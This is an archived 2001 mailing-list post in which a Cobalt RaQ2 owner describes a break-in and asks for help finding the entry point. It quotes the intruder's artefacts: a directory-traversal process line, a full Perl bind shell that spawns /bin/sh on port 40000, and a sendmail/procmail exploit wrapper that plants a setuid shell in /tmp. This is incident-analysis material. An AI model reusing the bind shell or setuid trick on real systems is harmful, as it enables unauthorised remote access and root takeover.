[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-users] Raq2 Hack

Subject: [cobalt-users] Raq2 Hack
From: Hacked Raq2 <jay-mon@xxxxxxxxxx>
Date: Sun Aug 19 02:11:16 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

Hello all,

Well, it seems that I've had an intruder on my Raq2. What I'm trying to
figure out, is how he got in. I have all the important patches applied and
I've shutdown telnet in favor of running OpenSSH 2.9. I also run logcheck
and portsentry and usually keep a close eye on things.

What I'd like to do, is just post some of the stuff I've found and see if
any of the security guru's might have an idea of what happened so I can
close things up. I realize that a OS Restore might be the only option, but I
would like to explore the depth of this h4x0r's intrusion.


Here's the processes that were running. It appears he only had the
privileges of HTTPD:

httpd    19108  0.0  0.6  3012   864  ?  S NAug 17   0:00 sh -c
/home/sites/site19/cgi-bin/Mall/../../../../../../../../../../../../../../..
/../../../../../../../../../
httpd    19112  0.0  1.3  4748  1740  ?  S NAug 17   0:00 perl /tmp/shell.pl
httpd    19130  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)
httpd    19425  0.0  1.0  3720  1280  ?  S NAug 17   0:29 ./psybnc
httpd    20481  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)
httpd    20562  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)
httpd    22086  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)
httpd    22228  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)

I also see that he had some kind of IRC program running.

Here are the contents of the shell.pl that he had in /tmp:

#!/usr/bin/perl
require 5.002;
use Socket;
$protocol = getprotobyname('tcp');
socket(S, &PF_INET, &SOCK_STREAM, $protocol) || die "can't create socketn";
 setsockopt(S, SOL_SOCKET, SO_REUSEA
DDR, 1);
 bind(S, sockaddr_in(40000, INADDR_ANY)) || die "can't bindn";
  listen(S, 3) || die "can't listenn";
   while (1) { YOP: accept (THC, S) || goto YOP;
   if (! ($pid=fork))
{ goto BYE if (! defined $pid);
 open STDIN, "<&THC"; open STDOUT, ">&THC";
 open STDERR, ">&THC";
  exec "/bin/sh -i" || print THC "couldn't spawn shelln";
  close THC; exit 0;}
else {BYE: close THC;}}

Here are a list of the files he put into /tmp:

1 httpd     httpd      983040 May 22 10:07 psyBNC.tar
1 httpd     httpd       639341 Aug 19 01:13 psybnc
1 httpd     httpd        10240 Nov  7  1999 sendmail-8.9.3.tar
2 httpd     httpd         1024 Aug 19 01:48 sendmail89x
1 httpd     httpd          559 Aug 17 19:30 shell.pl
1 httpd     httpd            1 Aug 17 21:25 suid.sh

The directory sendmail89x has the following files in it:

529 Jul  2  1999 exploit.sh
1287 Jul  1  1999 sendmail.c

Here are the contents of exploit.sh:

#!/bin/sh
# rpmmail (sendmail 8.9.3/8.9.1 procmail 3.10.x)
# by icesk, greetz to that triq ass bitch from ATR, obsolete, and #b4b0
echo "[icesk] createing suid shellscript"
echo <<EOF > /tmp/suid.sh
#!/bin/sh
cp /bin/sh /tmp/sh;chmod +s /tmp/sh
EOF
chmod +x /tmp/suid.sh
echo "[icesk] `ls -l /tmp/suid.sh`"
echo "[icesk] compileing exploit"
gcc -o sendmail sendmail.c
echo "[icesk] expl01t1ng m41l f34r!@$"
./sendmail 127.0.0.1 /tmp/suid.sh
echo "[icesk] allow 10 minutes for mail to cycle then run /tmp/sh"
echo "[icesk] done."

If anyone could help me understand this exploit a little more and maybe give
me some ideas on where to look for his entry point, I would really
appreciate it.

TIA,
h4ck3d

Follow-Ups:
- RE: [cobalt-users] Raq2 Hack
  - From: Sim Ayers
- Re: [cobalt-users] Raq2 Hack
  - From: flash22

Prev by Date: Re: OT RE: [cobalt-users] Stop eZula from stealing bandwidth
Next by Date: RE: [cobalt-users] Ezula POSSIBLE PROBLEM WITH SOLUTION
Previous by thread: Re: [cobalt-users] RAM on Raq3
Next by thread: RE: [cobalt-users] Raq2 Hack

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index